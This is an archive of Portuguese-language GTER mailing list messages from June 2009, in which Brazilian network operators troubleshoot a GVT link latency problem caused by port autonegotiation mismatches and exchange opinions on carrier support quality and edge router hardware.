Costa raphaelbscosta at yahoo.com.br raphaelbscosta at gmail.com From fcricardo at msn.com Fri Jun 5 08:48:05 2009 From: fcricardo at msn.com (Ricardo Castanheira) Date: Fri, 5 Jun 2009 11:48:05 +0000 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <6bb5f5b10906041926pf640d15p608eb41216bd2092@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <6bb5f5b10906041002w767b9542ua778293e8d9751d2@mail.gmail.com> <6bb5f5b10906041926pf640d15p608eb41216bd2092@mail.gmail.com> Message-ID: Rubens est? correto na temos um legado antigo em SP. Ricardo Castanheira > Date: Thu, 4 Jun 2009 23:26:32 -0300 > From: rubensk at gmail.com > To: gter at eng.registro.br > Subject: Re: [GTER] Problemas GVT - o que fazer? > > Eu me referi ? rede da CTBC que antes era Iqara Telecom, na regi?o > metropolitana de SP. > Voc? se refere ? rede da CTBC no Tri?ngulo Mineiro ? Porque realmente > me falam que a rede no tri?ngulo ? toda Cisco. > > > Rubens > > > 2009/6/4 Ricardo Castanheira : > > > > Rubens, a rede da CTBC "Metro" ? 100% cisco. > > O produtos da DataCom n?o est?o nem homologados. > > Fora da rede metro pode haver sim. > > > > Abra?os > > Ricardo Castanheira > > > >> Date: Thu, 4 Jun 2009 14:02:30 -0300 > >> From: rubensk at gmail.com > >> To: gter at eng.registro.br > >> Subject: Re: [GTER] Problemas GVT - o que fazer? > >> > >> Infelizmente a rede metro da CTBC ? quase toda DATACOM, com alguns > >> Cisco apenas quando necess?rios features tipo QinQ. Espero que seu > >> e-mail chegue a algu?m de l?... > >> > >> > >> Rubens > >> > >> > >> 2009/6/3 Andr? Costa : > >> > Caros colegas, > >> > > >> > Se for envolvido equipamento DATACOM realmente existe at? uma nota no site > >> > deles falando sobre o assunto, as teles tem seguido o conselho de for?ar a > >> > porta. > >> > > >> > Aqui na empresa resolvemos n?o utilizar mais DATACOM por esses e outros > >> > problemas. S?o equipamentos muito problem?tico e suporte ? p?ssimo. > >> > > >> > > >> > > >> > 2009/6/3 Patrich Pizzolo > >> > > >> >> Obrigado pelas respostas, > >> >> n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias > >> >> atr?s este problema aqui, s? ficou ok quando forcei minha eth para 100Mbps > >> >> Full-Duplex! > >> >> Por?m o problema est? bem isolado, j? coloquei diversos notebooks e > >> >> desktops > >> >> e o problema sempre persiste sim! > >> >> > >> >> Creio que seja exatamente o caso de porta do Switch Datacom no qual o > >> >> Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de conta > >> >> e ouvidoria para verificarem isto e eles continuam afirmando > >> >> categoricamente > >> >> que n?o h? problema! > >> >> > >> >> Alguma id?ia? > >> >> > >> >> > >> >> 2009/6/3 Juliano S. Nascimento > >> >> > >> >> > > >> >> > > >> >> > > >> >> > > Voce checou poss?veis port-mismatch ? > >> >> > Auto-negocia??o X portas for?adas ? > >> >> > > > >> >> > > Corre uma lenda por a? que as portas fastethernet devem ser > >> >> > for?adas a > >> >> > > 100Mb/s. Na verdade essa hist?ria > >> >> > remonta h? anos quando existia um bug na > >> >> > > > >> >> > negocia??o de alguns equipamentos que faziam os mesmos > >> >> > negociarem como > >> >> > > half. > >> >> > > Isso acabou e s? sobrou a > >> >> > lenda. > >> >> > > > >> >> > > A regra ?: > >> >> > > > >> >> > > - > >> >> > Auto-negocia??o com auto-negoci???o > >> >> > > - Porta for?ada (sem autoneg) com Porta for?ada > >> >> > > > >> >> > > Qualquer outra combina??o trar? > >> >> > problemas. > >> >> > > > >> >> > > Voc? colocou 1 notebook ligado > >> >> > direto no link para eliminar problemas com > >> >> > > sua rede, seu > >> >> > firewall, etc? > >> >> > > > >> >> > > Grato. > >> >> > > > >> >> > > 2009/6/3 > >> >> > Patrich Pizzolo > >> >> > > > >> >> > >> Bom dia > >> >> > a todos, > >> >> > >> gostaria de ter uma opini?o dos ilustres > >> >> > colegas que integram esta > >> >> > >> lista. > >> >> > >> Tenho um link > >> >> > de 10Mbps por fibra e ap?s um problema em um switch da GVT > >> >> > >> meu > >> >> > >> tempo de resposta entre a Eth do meu router e > >> >> > a do router da gvt que s?o > >> >> > >> interligados por uma fibra > >> >> > est? chegando a picos de at? 946ms com uma > >> >> > >> > >> >> > m?dia > >> >> > >> em torno de 10ms, isso com o link isolado e > >> >> > j? testei com diversos > >> >> > >> outros > >> >> > >> routers e > >> >> > sempre obtenho os mesmos tempos de resposta, definitivamente > >> >> > >> > >> >> > n?o > >> >> > >> tenho problema nesta ponta. Possuo um outro link > >> >> > com a BrT e est? tudo > >> >> > >> normal com tempo de resposta > >> >> > excelente sem nenhuma varia??o deste tipo. > >> >> > >> > >> >> > Estou nesta situa??o h? 7 dias e o pessoal da > >> >> > operadora insiste em dizer > >> >> > >> que > >> >> > >> est? > >> >> > tudo normal. J? nem aguento mais falar com eles... > >> >> > >> > >> >> > >> Algu?m tem alguma id?ia? > >> >> > >> > >> >> > >> No momento estou pensando em acionar e cancelar o link. > >> >> > > >> >> > Caro, > >> >> > > >> >> > Tivemos o mesmo problema algum tempo atras com a > >> >> > GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal > >> >> > configurados e n?o terem resultados positivos com esta > >> >> > afirma??o, trocaram nossa porta no Switch deles, resolvendo > >> >> > nosso problema. > >> >> > > >> >> > OBS: Alegaram que a vlan estava com uma > >> >> > configura??o errada, ocasionado tais problemas. > >> >> > > >> >> > > >> >> > > >> >> > >> > >> >> > >> Abra?os, > >> >> > >> > >> >> > Obrigado! > >> >> > >> -- > >> >> > >> gter list > >> >> > https://eng.registro.br/mailman/listinfo/gter > >> >> > >> > >> >> > > > >> >> > -- > >> >> > > gter list https://eng.registro.br/mailman/listinfo/gter > >> >> > > > >> >> > > >> >> > > >> >> > -- > >> >> > > >> >> > > >> >> > -- > >> >> > gter list https://eng.registro.br/mailman/listinfo/gter > >> >> > > >> >> > >> >> > >> >> > >> >> -- > >> >> Abra?os, > >> >> > >> >> Patrich Pizzolo > >> >> IT Coordinator > >> >> +55-48-9944-9090 > >> >> +55-47-8407-7768 > >> >> pizzolo at gmail.com > >> >> Skype: pizzolo_br > >> >> MSN: patrich_pizzolo at hotmail.com > >> >> SL: Xpiz Beam > >> >> Taikodom: Deathwing_br > >> >> -- > >> >> gter list https://eng.registro.br/mailman/listinfo/gter > >> >> > >> > > >> > > >> > > >> > -- > >> > Andr? Costa > >> > Chief Executive Officer > >> > Ib?ria Brasil Telecomunica??es > >> > (71) 2223-9026 / 7811-5816 > >> > NEXTEL 55*91*9228 > >> > -- > >> > gter list https://eng.registro.br/mailman/listinfo/gter > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > > > > _________________________________________________________________ > > Show them the way! Add maps and directions to your party invites. > > http://www.microsoft.com/windows/windowslive/products/events.aspx > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter _________________________________________________________________ Show them the way! Add maps and directions to your party invites. http://www.microsoft.com/windows/windowslive/products/events.aspx From gustkiller at gmail.com Fri Jun 5 08:55:33 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Fri, 5 Jun 2009 08:55:33 -0300 Subject: [GTER] roteador de borda In-Reply-To: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> Message-ID: <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> Aqui, dois Mikrotiks com 155Mbits redundantes por vrrp. 2009/6/4 Herlon Alcantara Matos > Eu utilizo Vyatta. > > O Vyatta no meu caso com volume de trafego em torno de 30 MB ? altamente > estavel, interface simples e para uma quantidade desta de link em uma > maquina com boas placas de rede , preferencialmente INTEL, voc? ira > trabalhar tranquilamente. > > > Herlon > LCI Telecom > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From herbert at scw.net.br Thu Jun 4 14:18:56 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Thu, 4 Jun 2009 14:18:56 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <4A280083.9070207@cyberweb.com.br> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <6bb5f5b10906041003u3080c35ex64f1cd0d6b7a3ffb@mail.gmail.com> <4A280083.9070207@cyberweb.com.br> Message-ID: <200906041418.56923.herbert@scw.net.br> Em Qui 04 Jun 2009, ?s 14:12:35, Juliano Primavesi - Cyberweb Networks escreveu: > Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, > acabei eu mesmo por resolver um certo problema de publica??o de rotas... deve ser porque eles come?aram a operar aqui na regi?o agora... Espero que continue assim (n?o mudem), pois um dos motivos de eu ter sa?do da Telefonica foi o atendimento que ele prestavam quando havia problemas (ou melhor, o atendimento que eles n?o prestavam). -- Herbert From ricardo at silicom.com.br Fri Jun 5 11:14:32 2009 From: ricardo at silicom.com.br (Ricardo Ranieri) Date: Fri, 05 Jun 2009 11:14:32 -0300 Subject: [GTER] Filtro Telefonica. In-Reply-To: <47B13B11-9299-4EBD-84C6-A14CC22A3918@unidatec.com.br> References: <47B13B11-9299-4EBD-84C6-A14CC22A3918@unidatec.com.br> Message-ID: <4A292848.8000709@silicom.com.br> Bom dia Temos o mesmo problema aqui, s? conseguimos acessar trocando o IP do site. Em nosso escrit?rio um dos links ? Ajato que faz a finaliza??o pela Telefonica, o site por exemplo do Mercado livre s? abre a p?gina inicial, n?o faz buscas de produtos. Ricardo Ranieri - ricardo.ranieri at silicom.com.br Silicom Solutions Provider S?o Paulo: (11) 2626.0239 Rio de Janeiro: (21) 4062.0099 Porto Alegre: (51) 4062.0025 Skype: silicomisp Solu??es de servidores dedicados e Cloud Solu??es de Backup Online - SiliBackup Daniel Oliveira escreveu: > Amigos, > > Possuo um link "speedy" cujo ip fixo esta no bloco 200.204.x.x > > Tenho tamb?m um servidor de hospedagem na The Planet 66.98.140.x > > H? 1 semana venho tendo problemas para acessar do meu speedy, sites > que est?o no IP citado (the planet). Consigo enviar pacotes ICMP > (ping) mas n?o consigo acessar nenhum dos sites tanto 80 quanto 21, > 22, 53, 110 e outras portas importantes. De outros links, como virtua > e etc, consigo acessar todos os sites normalmente. > > Com base no ultimo ataque que a telefonica sofreu, existe alguma > possibilidade de existir um filtro impedindo esse acesso? pois imagino > que meu IP fixo esta entre alguns servidores da telefonica por iniciar > com 200.204..., e como a maioria dos ataques partem dos datacenters de > fora (como the planet) estou com essa impress?o. > > O suporte da telefonica afirma que o problema ser? resolvido em 24 > horas, mas isso foi antes de ontem e at? agora nada. > > O que pode ser? > > > > Obrigado... > > > Daniel > -- > gter list https://eng.registro.br/mailman/listinfo/gter From thomas at tcnet.com.br Fri Jun 5 10:40:24 2009 From: thomas at tcnet.com.br (Thomas Britis) Date: Fri, 05 Jun 2009 10:40:24 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <6ECDBF9BB24F4C2991D5C7295C83FD3C@atinet.com.br> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br><6bb5f5b10906041003u3080c35ex64f1cd0d6b7a3ffb@mail.gmail.com> <4A280083.9070207@cyberweb.com.br> <6ECDBF9BB24F4C2991D5C7295C83FD3C@atinet.com.br> Message-ID: <4A292048.1020907@tcnet.com.br> Edinilson - ATINET wrote: > Aqui eu ando meio frustrado com a "latencia" no atendimento da Global > Crossing. > -Demoram para o 1o. contato (que normalmente nao sabe de nada); > -Demoram mais 4 horas para o 2o. contato (alguem que nao sabe fazer, mas > sabe de alguem que sabe); > -Demoram mais 12 horas para o 3o. contato (realmente quem vai resolver). > Normalmente 2 dias depois. > -E, por fim, nunca retornam dizendo se o chamado foi ou nao fechado. > > Quem tem acesso com Global Crossing, poderia confirmar se ? normal isto? Eu confirmo que ? extremamente normal. -- Thomas Storino Britis TCNet Informatica e Telecomunicacoes LTDA From herbert at scw.net.br Thu Jun 4 14:24:25 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Thu, 4 Jun 2009 14:24:25 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <6bb5f5b10906041002w767b9542ua778293e8d9751d2@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <6bb5f5b10906041002w767b9542ua778293e8d9751d2@mail.gmail.com> Message-ID: <200906041424.25148.herbert@scw.net.br> Em Qui 04 Jun 2009, ?s 14:02:30, Rubens Kuhl escreveu: > Infelizmente a rede metro da CTBC ? quase toda DATACOM, com alguns > Cisco apenas quando necess?rios features tipo QinQ Aqui tem um metro CTBC/Algar com Cisco (um ME), entrega 1000/full (autoneg, flow-control, etc) direitinho no nosso 2821 e at? onde sei, pelo menos aqui na regi?o, todos s?o assim (pelo menos nos demais que tive acesso, n?o sei se s?o em todos). -- Herbert From lscrlstld at gmail.com Fri Jun 5 12:58:07 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Fri, 5 Jun 2009 12:58:07 -0300 Subject: [GTER] RES: roteador de borda In-Reply-To: <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> Message-ID: <45C59D91582E40F2AEB3A622C0789A7C@toledoPC> RB1000 ? > -----Mensagem original----- > De: gter-bounces at eng.registro.br > [mailto:gter-bounces at eng.registro.br] Em nome de Gustavo Santos > Enviada em: sexta-feira, 5 de junho de 2009 08:56 > Para: Herlon Alcantara Matos; Grupo de Trabalho de Engenharia > e Operacao de Redes > Assunto: Re: [GTER] roteador de borda > > Aqui, dois Mikrotiks com 155Mbits redundantes por vrrp. > > 2009/6/4 Herlon Alcantara Matos > > > Eu utilizo Vyatta. > > > > O Vyatta no meu caso com volume de trafego em torno de 30 MB ? > > altamente estavel, interface simples e para uma quantidade desta de > > link em uma maquina com boas placas de rede , > preferencialmente INTEL, > > voc? ira trabalhar tranquilamente. > > > > > > Herlon > > LCI Telecom > > > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From security at neogrid.com Fri Jun 5 17:47:50 2009 From: security at neogrid.com (NOC NeoGrid) Date: Fri, 5 Jun 2009 17:47:50 -0300 Subject: [GTER] =?iso-8859-1?q?Embratel_e_Telef=F4nica?= Message-ID: Boa tarde, Algu?m com links MPLS Embratel e/ou FRAME RELAY Telef?nica notou alguma perda de pacotes, intermit?ncia nos ?ltimos dias? Hoje principalmente? Att, Dilson. From cristinafs.listas at gmail.com Fri Jun 5 17:49:11 2009 From: cristinafs.listas at gmail.com (Cristina Fernandes Silva) Date: Fri, 5 Jun 2009 17:49:11 -0300 Subject: [GTER] =?iso-8859-1?q?Embratel_e_Telef=F4nica?= In-Reply-To: References: Message-ID: <35beb8610906051349h79a32decnc0bdaf51af0419fb@mail.gmail.com> temos aqui.. e n?o notamos nada de diferente em as nossas filiais. 2009/6/5 NOC NeoGrid : > Boa tarde, > > Algu?m com links MPLS Embratel e/ou FRAME RELAY Telef?nica notou alguma perda de pacotes, intermit?ncia nos ?ltimos dias? Hoje principalmente? > > Att, > > Dilson. > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From rodrigo at cliknet.com.br Fri Jun 5 13:19:27 2009 From: rodrigo at cliknet.com.br (=?ISO-8859-1?Q?Rodrigo_Melga=E7o_Alves?=) Date: Fri, 05 Jun 2009 13:19:27 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: References: Message-ID: <4A29458F.7000502@cliknet.com.br> Epafras, Sou clientes da CTBC a mais de dez anos e j? que voc? deu este espa?o gostaria de apresentar os maiores problemas que eu tenho visto com rela??o ao atendimento. Quanto se abre uma reclama??o no 0800 ? comum acontecer do t?cnico fechar a reclama??o sem resolver o problema, parece que para n?o afetar os indicadores. Segue como exemplo o protocolo 33424990 de 27/01/09 Nunca em todo esse tempo que somos clientes recebemos um retorno que qualquer das reclama??es abertas informando que foi solucionado e muito menos o motivo. Existe sempre um problema onde a informa??o das necessidades sempre s?o distorcidas entre o departamento comercial e o departamento t?cnico da CTBC. Sempre que ultrapassa o prazo determinado de solu??o de um problema abrimos uma reclama??o na Anatel e ? comum a reclama??o na Anatel ser fechada incorretamente pela CTBC como: "defeito ? no cliente e n?o na CTBC" ou "j? est? resolvido" De uns 6 meses para c?, em algumas novas implanta??es colocaram uma pessoa fazendo o meio de campo entre n?s e a ctbc (departamento t?cnico) e isso funcionou maravilhosamente. Se isso acontecesse no p?s venda tenho certeza que todos os outros problemas seriam minimizados para pr?ximo de zero. J? conversamos algumas vezes no passado e tenho certeza que voc? vai lembrar que sou. Gosto muito da presta??o de servi?o da CTBC e estou colocando isto no intuito de que voc?s possam avaliar e melhorar o atendimento. Foi mais uma vez um prazer conversar com voc?. Rodrigo Melga?o Alves epafras at ctbc.com.br escreveu: > Grandes Mestres (Hebert, Rubens, Juliano and all), > > ? sempre bom para n?s ouvirmos depoimentos legais como o do Hebert e > trabalhamos sempre para que tenhamos mais e mais fatos como este aqui na > CTBC. Tamb?m pessoalmente n?o tenho a inten??o de resolver todos os > problemas mas, se algum de voc?s tiver alguma complica??o no > relacionamento conosco, principalmente com rela??o a roteamento (?rea que > me compete), fiquem a vontade em me acionar diretamente... no demais, > estamos trabalhando para melhorar sempre... at? IPv6 aqui j? funciona > n?o eh Juliano ??? :-) > > Valeu.. Abs.. > > Epafras Schaden > Engenharia de Redes IP > CTBC/Algar Telecom > > > > > > > Re: [GTER] RES: Ainda problemas com a telefonica > > Juliano Primavesi - Cyberweb Networks > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 04/06/2009 14:09 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > > Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, > acabei eu mesmo por resolver um certo problema de publica??o de rotas... > > Juliano > > Rubens Kuhl escreveu: > >> Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor >> do que a nossa. >> >> >> Rubens >> >> >> >> >>> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super >>> > r?pido, > >>> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava >>> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m >>> > n?vel > >>> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem >>> > o > >>> problema ligaram novamente perguntando como estava o link! >>> >>> Quem est? acostumado com a Telefonica (com aquele 0800 que quando >>> > consegue > >>> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e >>> > nunca > >>> resolvem nada) se espanta com um atendimento como esse (que relatei >>> > sobre a > >>> Algar). >>> >>> -- >>> Herbert >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > > From gustkiller at gmail.com Fri Jun 5 14:55:15 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Fri, 5 Jun 2009 14:55:15 -0300 Subject: [GTER] RES: roteador de borda In-Reply-To: <45C59D91582E40F2AEB3A622C0789A7C@toledoPC> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> <45C59D91582E40F2AEB3A622C0789A7C@toledoPC> Message-ID: <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> HP ML 110 G5 ( mais barato e mais eficiente) com interfaces hp intel gigabit pci-express. Eu me decepcionei um pouco com a rb1000 quando se utiliza centenas de queues e filtros. 2009/6/5 Toledo, Luis Carlos > RB1000 ? > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br > > [mailto:gter-bounces at eng.registro.br] Em nome de Gustavo Santos > > Enviada em: sexta-feira, 5 de junho de 2009 08:56 > > Para: Herlon Alcantara Matos; Grupo de Trabalho de Engenharia > > e Operacao de Redes > > Assunto: Re: [GTER] roteador de borda > > > > Aqui, dois Mikrotiks com 155Mbits redundantes por vrrp. > > > > 2009/6/4 Herlon Alcantara Matos > > > > > Eu utilizo Vyatta. > > > > > > O Vyatta no meu caso com volume de trafego em torno de 30 MB ? > > > altamente estavel, interface simples e para uma quantidade desta de > > > link em uma maquina com boas placas de rede , > > preferencialmente INTEL, > > > voc? ira trabalhar tranquilamente. > > > > > > > > > Herlon > > > LCI Telecom > > > > > > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From guto at ccuec.unicamp.br Fri Jun 5 18:14:16 2009 From: guto at ccuec.unicamp.br (Augusto G. Andreollo) Date: Fri, 05 Jun 2009 18:14:16 -0300 Subject: [GTER] Rompimento de fibra In-Reply-To: <276fbe8b0905200811v4cea05fen40e6edef056edc98@mail.gmail.com> References: <4A12BAD2.15A6.0046.0@trf3.jus.br> <276fbe8b0905191034x64186520k10383e413d25bd4d@mail.gmail.com> <4A1416A5.1070105@jarruda.com> <276fbe8b0905200811v4cea05fen40e6edef056edc98@mail.gmail.com> Message-ID: <1244236456.79140.5.camel@londrina.ccuec.unicamp.br> Uma coisa que eu j? vi por aqui ? uma faixa amarela brilhante, enterrada a uns 40 cm abaixo da superf?cie, com os dizeres "FIBRA ?PTICA - N?O ESCAVAR - CONTATO TEL xxxxxxxxx".. e a fibra em s? fica enterrada bem debaixo disso, a uns 140 cm da superf?cie... Nunca tinha visto isso antes, conheci quando me trouxeram um peda?o da dita fita que foi removida por uma retro-escavadeira em uma obra aqui do lado.. On Wed, 2009-05-20 at 12:11 -0300, Gustavo Santos wrote: > No brasil nunca vi uma placa parecida com isto rsrs. > > 2009/5/20 Julio Arruda > > > Gustavo Santos wrote: > > > >> Sobre isto, presenciei umexemplo, que o engenheiro responsavel por uma > >> obra, > >> que iria romper nossa fibra e a fibra de outras operadoras como OI e > >> Embratel respondeu o seguinte. " O problema ? de voc?s, deem um jeito > >> pois > >> o terreno ? nosso e vamos tirar tudo que estiver em baixo." > >> > >> Acho que por este motivo eles n?o perguntam.. > >> > >> > > > > Curioso.. > > Nos varios estados aqui, aparentemente e' LEI, eles tem ate um catchphrase > > :-), "Call Before You Dig", em placas e etc, e uma nota, 'It is the Law !" > > > > Como em minha experiencia, (IANAL), so ter a lei nao adianta, certamente > > tem uma multa pesada se nao verificarem antes... > > > > > > 2009/5/19 MARLON BORBA > >> > >> Foi alguma escavadeira cortando o ch?o? > >>> Se sim, fico imaginando o por que de as empresas respons?veis pelas > >>> obras n?o procurarem saber, antes de come?ar o trabalho, se existem > >>> fibras ?ticas enterradas... > >>> > >>> > >>> -- > >>> > >>> Abra?os, > >>> > >>> Marlon Borba, CISSP, APC DataCenter Associate > >>> T?cnico Judici?rio ? Seguran?a da Informa??o > >>> Comiss?o Local de Resposta a Incidentes - CLRI > >>> TRF 3 Regi?o > >>> (11) 3012-1581 > >>> -- > >>> Practically no IT system is risk free. > >>> (NIST Special Publication 800-30) > >>> -- > >>> > >>> > >>> Em 19/5/2009 ?s 11:34, "Eduardo Schoedler - Viavale Internet" > >>> gravou: > >>> > >>> Senhores. > >>>> > >>>> Gostaria de informar que houve rompimento de fibra no interior do RS, > >>>> > >>> quem > >>> > >>>> vai em dire??o ? Santa Maria, passando por Santa Cruz do Sul. > >>>> Embratel e GVT est?o totalmente fora aqui na regi?o, e BRT est? com > >>>> dificuldades. > >>>> > >>>> -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter -- Augusto G. Andreollo CCUEC/DCNET/SREDE Universidade Estadual de Campinas - UNICAMP +55 19 3521-2276 -- "Wit beyond measure is men's greatest treasure." From herbert at scw.net.br Fri Jun 5 14:21:40 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Fri, 5 Jun 2009 14:21:40 -0300 Subject: [GTER] roteador de borda In-Reply-To: <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> Message-ID: <200906051421.41166.herbert@scw.net.br> On Fri 05 Jun 2009 08:55:33 Gustavo Santos wrote: > Aqui, dois Mikrotiks com 155Mbits redundantes por vrrp. x86, mipsbe, mipsle? Caso x86 alguma placa deles ou em PC? E se n?o for abusar muito, ainda em x86, quais s?o os NICs utilizados (t? usando bonding), RAM (BGP full?) e como o hardware se comporta (processamento, etc). -- Herbert From herlon at lcimt.com.br Sat Jun 6 09:09:41 2009 From: herlon at lcimt.com.br (Herlon Alcantara Matos) Date: Sat, 6 Jun 2009 08:09:41 -0400 Subject: [GTER] Problemas GVT - o que fazer? (Ricardo Castanheira) References: Message-ID: <01E8EC18AAF44C43AA013EDAB0C6BD61@SUporteHerlon> Tive o mesmo problema com a Embratel (Datacom). Todo dia, abria um chamado. O pior era a ignorancia dos atendentes do suporte, Sr. no teste de icmp n?o consta nenhum problema. Depois de muito insistir me disseram ser um problema na FastEthernet de meu Cisco, pois do lado deles n?o era perceptivel tal problema. Solicitei que descrevessem isto na solu??o do chamado, adquiri outra interface, mudei de posi??o no roteador e mesmo assim continuou o problema. Abri um novo chamado de posse da interface nova, quando o pessoal tecnico deles chegou, novamente a alega??o foi a mesma. De posse da nova interface, coloquei ela e configurei no router e pedi para que provassem que era o problema da interface nova. (Dura??o desta novela 21 dias) O que resultou finalmente na troca do equipamento por eles. Sugiro que fa?a o mesmo procedimento com GVT. Herlon LCI Telecom ----- Original Message ----- From: To: Sent: Friday, June 05, 2009 4:49 PM Subject: gter Digest, Vol 75, Issue 25 > Send gter mailing list submissions to > gter at eng.registro.br > > To subscribe or unsubscribe via the World Wide Web, visit > https://eng.registro.br/mailman/listinfo/gter > or, via email, send a message with subject or body 'help' to > gter-request at eng.registro.br > > You can reach the person managing the list at > gter-owner at eng.registro.br > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of gter digest..." > > > Today's Topics: > > 1. Re: Problemas GVT - o que fazer? (Ricardo Castanheira) > > ---------------------------------------------------------------------- > > Message: 1 > Date: Fri, 5 Jun 2009 11:48:05 +0000 > From: Ricardo Castanheira > Subject: Re: [GTER] Problemas GVT - o que fazer? > To: > Message-ID: > Content-Type: text/plain; charset="iso-8859-1" > > > Rubens est? correto na temos um legado antigo em SP. > > Ricardo Castanheira > >> Date: Thu, 4 Jun 2009 23:26:32 -0300 >> From: rubensk at gmail.com >> To: gter at eng.registro.br >> Subject: Re: [GTER] Problemas GVT - o que fazer? >> >> Eu me referi ? rede da CTBC que antes era Iqara Telecom, na regi?o >> metropolitana de SP. >> Voc? se refere ? rede da CTBC no Tri?ngulo Mineiro ? Porque realmente >> me falam que a rede no tri?ngulo ? toda Cisco. >> >> >> Rubens >> >> >> 2009/6/4 Ricardo Castanheira : >> > >> > Rubens, a rede da CTBC "Metro" ? 100% cisco. >> > O produtos da DataCom n?o est?o nem homologados. >> > Fora da rede metro pode haver sim. >> > >> > Abra?os >> > Ricardo Castanheira >> > >> >> Date: Thu, 4 Jun 2009 14:02:30 -0300 >> >> From: rubensk at gmail.com >> >> To: gter at eng.registro.br >> >> Subject: Re: [GTER] Problemas GVT - o que fazer? >> >> >> >> Infelizmente a rede metro da CTBC ? quase toda DATACOM, com alguns >> >> Cisco apenas quando necess?rios features tipo QinQ. Espero que seu >> >> e-mail chegue a algu?m de l?... >> >> >> >> >> >> Rubens >> >> >> >> >> >> 2009/6/3 Andr? Costa : >> >> > Caros colegas, >> >> > >> >> > Se for envolvido equipamento DATACOM realmente existe at? uma nota >> >> > no site >> >> > deles falando sobre o assunto, as teles tem seguido o conselho de >> >> > for?ar a >> >> > porta. >> >> > >> >> > Aqui na empresa resolvemos n?o utilizar mais DATACOM por esses e >> >> > outros >> >> > problemas. S?o equipamentos muito problem?tico e suporte ? p?ssimo. >> >> > >> >> > >> >> > >> >> > 2009/6/3 Patrich Pizzolo >> >> > >> >> >> Obrigado pelas respostas, >> >> >> n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 >> >> >> dias >> >> >> atr?s este problema aqui, s? ficou ok quando forcei minha eth para >> >> >> 100Mbps >> >> >> Full-Duplex! >> >> >> Por?m o problema est? bem isolado, j? coloquei diversos notebooks e >> >> >> desktops >> >> >> e o problema sempre persiste sim! >> >> >> >> >> >> Creio que seja exatamente o caso de porta do Switch Datacom no qual >> >> >> o >> >> >> Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente >> >> >> de conta >> >> >> e ouvidoria para verificarem isto e eles continuam afirmando >> >> >> categoricamente >> >> >> que n?o h? problema! >> >> >> >> >> >> Alguma id?ia? >> >> >> >> >> >> >> >> >> 2009/6/3 Juliano S. Nascimento >> >> >> >> >> >> > >> >> >> > >> >> >> > >> >> >> > > Voce checou poss?veis port-mismatch ? >> >> >> > Auto-negocia??o X portas for?adas ? >> >> >> > > >> >> >> > > Corre uma lenda por a? que as portas fastethernet devem ser >> >> >> > 